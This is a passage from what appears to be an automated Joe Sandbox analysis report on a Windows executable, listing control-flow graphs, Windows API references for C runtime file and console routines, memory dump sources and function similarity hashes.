                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF78F49F56A,?,?,-00000018,00007FF78F49B317,?,?,?,00007FF78F49B20E,?,?,?,00007FF78F496452), ref: 00007FF78F49F358
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                                                  • Opcode ID: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
                                                                                                                                                                                                                                                                                                  • Instruction ID: d1943fdb40502702a4653987b9bdeef96e3c3b76c06ef2bf8e488122e4aff2e2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E141D631B1968241FA26EB569800AF5A391FF45BA0FE84536DD0D5B7A4DE3DE449C320

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 679 7ff78f49c01c-7ff78f49c042 680 7ff78f49c044-7ff78f49c058 call 7ff78f4954a4 call 7ff78f4954c4 679->680 681 7ff78f49c05d-7ff78f49c061 679->681 699 7ff78f49c44e 680->699 682 7ff78f49c437-7ff78f49c443 call 7ff78f4954a4 call 7ff78f4954c4 681->682 683 7ff78f49c067-7ff78f49c06e 681->683 702 7ff78f49c449 call 7ff78f49aea4 682->702 683->682 685 7ff78f49c074-7ff78f49c0a2 683->685 685->682 688 7ff78f49c0a8-7ff78f49c0af 685->688 691 7ff78f49c0b1-7ff78f49c0c3 call 7ff78f4954a4 call 7ff78f4954c4 688->691 692 7ff78f49c0c8-7ff78f49c0cb 688->692 691->702 697 7ff78f49c0d1-7ff78f49c0d7 692->697 698 7ff78f49c433-7ff78f49c435 692->698 697->698 703 7ff78f49c0dd-7ff78f49c0e0 697->703 700 7ff78f49c451-7ff78f49c468 698->700 699->700 702->699 703->691 706 7ff78f49c0e2-7ff78f49c107 703->706 708 7ff78f49c13a-7ff78f49c141 706->708 709 7ff78f49c109-7ff78f49c10b 706->709 710 7ff78f49c143-7ff78f49c16b call 7ff78f49dbbc call 7ff78f49af0c * 2 708->710 711 7ff78f49c116-7ff78f49c12d call 7ff78f4954a4 call 7ff78f4954c4 call 7ff78f49aea4 708->711 712 7ff78f49c132-7ff78f49c138 709->712 713 7ff78f49c10d-7ff78f49c114 709->713 744 7ff78f49c188-7ff78f49c1b3 call 7ff78f49c844 710->744 745 7ff78f49c16d-7ff78f49c183 call 7ff78f4954c4 call 7ff78f4954a4 710->745 741 7ff78f49c2c0 711->741 714 7ff78f49c1b8-7ff78f49c1cf 712->714 713->711 713->712 718 7ff78f49c1d1-7ff78f49c1d9 714->718 719 7ff78f49c24a-7ff78f49c254 call 7ff78f4a3f8c 714->719 718->719 723 7ff78f49c1db-7ff78f49c1dd 718->723 730 7ff78f49c25a-7ff78f49c26f 719->730 731 7ff78f49c2de 719->731 723->719 727 7ff78f49c1df-7ff78f49c1f5 723->727 727->719 732 7ff78f49c1f7-7ff78f49c203 727->732 730->731 736 7ff78f49c271-7ff78f49c283 GetConsoleMode 730->736 734 7ff78f49c2e3-7ff78f49c303 ReadFile 731->734 732->719 737 7ff78f49c205-7ff78f49c207 732->737 739 7ff78f49c309-7ff78f49c311 734->739 740 7ff78f49c3fd-7ff78f49c406 GetLastError 734->740 736->731 742 7ff78f49c285-7ff78f49c28d 736->742 737->719 743 7ff78f49c209-7ff78f49c221 737->743 739->740 746 7ff78f49c317 739->746 749 7ff78f49c423-7ff78f49c426 740->749 750 7ff78f49c408-7ff78f49c41e call 7ff78f4954c4 call 7ff78f4954a4 740->750 751 7ff78f49c2c3-7ff78f49c2cd call 7ff78f49af0c 741->751 742->734 748 7ff78f49c28f-7ff78f49c2b1 ReadConsoleW 742->748 743->719 752 7ff78f49c223-7ff78f49c22f 743->752 744->714 745->741 755 7ff78f49c31e-7ff78f49c333 746->755 757 7ff78f49c2d2-7ff78f49c2dc 748->757 758 7ff78f49c2b3 GetLastError 748->758 762 7ff78f49c2b9-7ff78f49c2bb call 7ff78f495438 749->762 763 7ff78f49c42c-7ff78f49c42e 749->763 750->741 751->700 752->719 761 7ff78f49c231-7ff78f49c233 752->761 755->751 765 7ff78f49c335-7ff78f49c340 755->765 757->755 758->762 761->719 769 7ff78f49c235-7ff78f49c245 761->769 762->741 763->751 771 7ff78f49c342-7ff78f49c35b call 7ff78f49bc34 765->771 772 7ff78f49c367-7ff78f49c36f 765->772 769->719 779 7ff78f49c360-7ff78f49c362 771->779 775 7ff78f49c371-7ff78f49c383 772->775 776 7ff78f49c3eb-7ff78f49c3f8 call 7ff78f49ba74 772->776 780 7ff78f49c385 775->780 781 7ff78f49c3de-7ff78f49c3e6 775->781 776->779 779->751 783 7ff78f49c38a-7ff78f49c391 780->783 781->751 784 7ff78f49c393-7ff78f49c397 783->784 785 7ff78f49c3cd-7ff78f49c3d8 783->785 786 7ff78f49c3b3 784->786 787 7ff78f49c399-7ff78f49c3a0 784->787 785->781 788 7ff78f49c3b9-7ff78f49c3c9 786->788 787->786 789 7ff78f49c3a2-7ff78f49c3a6 787->789 788->783 790 7ff78f49c3cb 788->790 789->786 791 7ff78f49c3a8-7ff78f49c3b1 789->791 790->781 791->788
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: be7416da91f84ed5bfdd546aa92e4ee07cb2f4e154380db95b5ab7bb0620c26f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3da9bfa78828ceaf90a384e899513b09906d731e327902bbf2c50f5982afd9a2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be7416da91f84ed5bfdd546aa92e4ee07cb2f4e154380db95b5ab7bb0620c26f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2C1B032B086C791E660AB559440BFDAAA4FB84B90FF50137DA4D873A2CE7CE445C760

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 902 7ff78f49d520-7ff78f49d545 903 7ff78f49d813 902->903 904 7ff78f49d54b-7ff78f49d54e 902->904 907 7ff78f49d815-7ff78f49d825 903->907 905 7ff78f49d550-7ff78f49d582 call 7ff78f49add8 904->905 906 7ff78f49d587-7ff78f49d5b3 904->906 905->907 909 7ff78f49d5b5-7ff78f49d5bc 906->909 910 7ff78f49d5be-7ff78f49d5c4 906->910 909->905 909->910 912 7ff78f49d5d4-7ff78f49d5e9 call 7ff78f4a3f8c 910->912 913 7ff78f49d5c6-7ff78f49d5cf call 7ff78f49c8e0 910->913 917 7ff78f49d5ef-7ff78f49d5f8 912->917 918 7ff78f49d703-7ff78f49d70c 912->918 913->912 917->918 919 7ff78f49d5fe-7ff78f49d602 917->919 920 7ff78f49d760-7ff78f49d785 WriteFile 918->920 921 7ff78f49d70e-7ff78f49d714 918->921 922 7ff78f49d604-7ff78f49d60c call 7ff78f494900 919->922 923 7ff78f49d613-7ff78f49d61e 919->923 924 7ff78f49d790 920->924 925 7ff78f49d787-7ff78f49d78d GetLastError 920->925 926 7ff78f49d716-7ff78f49d719 921->926 927 7ff78f49d74c-7ff78f49d75e call 7ff78f49cfd8 921->927 922->923 931 7ff78f49d620-7ff78f49d629 923->931 932 7ff78f49d62f-7ff78f49d644 GetConsoleMode 923->932 934 7ff78f49d793 924->934 925->924 928 7ff78f49d738-7ff78f49d74a call 7ff78f49d1f8 926->928 929 7ff78f49d71b-7ff78f49d71e 926->929 949 7ff78f49d6f0-7ff78f49d6f7 927->949 928->949 935 7ff78f49d7a4-7ff78f49d7ae 929->935 936 7ff78f49d724-7ff78f49d736 call 7ff78f49d0dc 929->936 931->918 931->932 939 7ff78f49d64a-7ff78f49d650 932->939 940 7ff78f49d6fc 932->940 942 7ff78f49d798 934->942 943 7ff78f49d7b0-7ff78f49d7b5 935->943 944 7ff78f49d80c-7ff78f49d811 935->944 936->949 947 7ff78f49d656-7ff78f49d659 939->947 948 7ff78f49d6d9-7ff78f49d6eb call 7ff78f49cb60 939->948 940->918 950 7ff78f49d79d 942->950 951 7ff78f49d7e3-7ff78f49d7ed 943->951 952 7ff78f49d7b7-7ff78f49d7ba 943->952 944->907 954 7ff78f49d664-7ff78f49d672 947->954 955 7ff78f49d65b-7ff78f49d65e 947->955 948->949 949->942 950->935 959 7ff78f49d7ef-7ff78f49d7f2 951->959 960 7ff78f49d7f4-7ff78f49d803 951->960 957 7ff78f49d7d3-7ff78f49d7de call 7ff78f495480 952->957 958 7ff78f49d7bc-7ff78f49d7cb 952->958 961 7ff78f49d6d0-7ff78f49d6d4 954->961 962 7ff78f49d674 954->962 955->950 955->954 957->951 958->957 959->903 959->960 960->944 961->934 964 7ff78f49d678-7ff78f49d68f call 7ff78f4a4058 962->964 968 7ff78f49d691-7ff78f49d69d 964->968 969 7ff78f49d6c7-7ff78f49d6cd GetLastError 964->969 970 7ff78f49d69f-7ff78f49d6b1 call 7ff78f4a4058 968->970 971 7ff78f49d6bc-7ff78f49d6c3 968->971 969->961 970->969 975 7ff78f49d6b3-7ff78f49d6ba 970->975 971->961 973 7ff78f49d6c5 971->973 973->964 975->971
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF78F49D50B), ref: 00007FF78F49D63C
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF78F49D50B), ref: 00007FF78F49D6C7
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 75de7c34e32bbf5a5521a4f835f46dc0f232c54d156f58927087b202a6c464dd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C791D532F1869185F750AF699440AFDABB0BB44B98FA4413BDE4E577A6CF39D441C320

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4170891091-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
                                                                                                                                                                                                                                                                                                  • Instruction ID: cee84180aa9e273bd040168f6b263881e69fc4e0c3854a971e1ffa11514a79b3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3551E672F041924AFB14EF649945AFCB7A1FB40368FA04136ED1E53AE5DB38A442C710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2780335769-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6f58b711056bdd2d3c29f62a6eae470ef88e6c2867bc027bbf8000c992d3bda8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8516932B086818AFB10EB61D4507FDA7E1BB48B68FB08536DE4D476A9DF38D485C720
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1452418845-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4a3eae527bce270e995a97debf5dd62933bb73a3af191b72cffba0786512ca5a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33312A31E292C341FA14BB6594917F9A791BF41784FE45037EA4E872E7CE2CA445C631
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4e99df99e7301f39d701a276f02ef329721f1d5d609599a82ba0c959db36bcb5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5fd8f38291c32b1d9a8c259c524d2429805915a95c30d35f299d80458f247036
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e99df99e7301f39d701a276f02ef329721f1d5d609599a82ba0c959db36bcb5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3418232F187C183E750AB6195107A9A3A0FB94764F709336E65C07AE5DF6CA5E4C710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
                                                                                                                                                                                                                                                                                                  • Instruction ID: 159c9e277c79297f57450790c4d08cd7238e678cd62fd3349881735c461de86b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2ED06730B4968642EA143F7258998F892157F48745FA0143AD80E073A7DD2DA84DC260
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                                                                                                                                                                                                                                                                  • Instruction ID: 21e578bd615c1de317df19e50a571004ec740fef8a5cf041f2bf17b5d60d9798
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C151C531B096D146EA64AE3A9400FFAA691BF44BA8FB44736DD6C477E6CE3CD441C620
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
                                                                                                                                                                                                                                                                                                  • Instruction ID: 203aad20d2de8aab30ed96e07886cd0cf16c86a52fd84d29c3170d56baca1b07
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0511BF72718BC281EA10AB25A4442A9A761BB44BF4FA40332EABD4B7E9CF7CD055C740
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78F495911), ref: 00007FF78F495A2F
                                                                                                                                                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78F495911), ref: 00007FF78F495A45
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
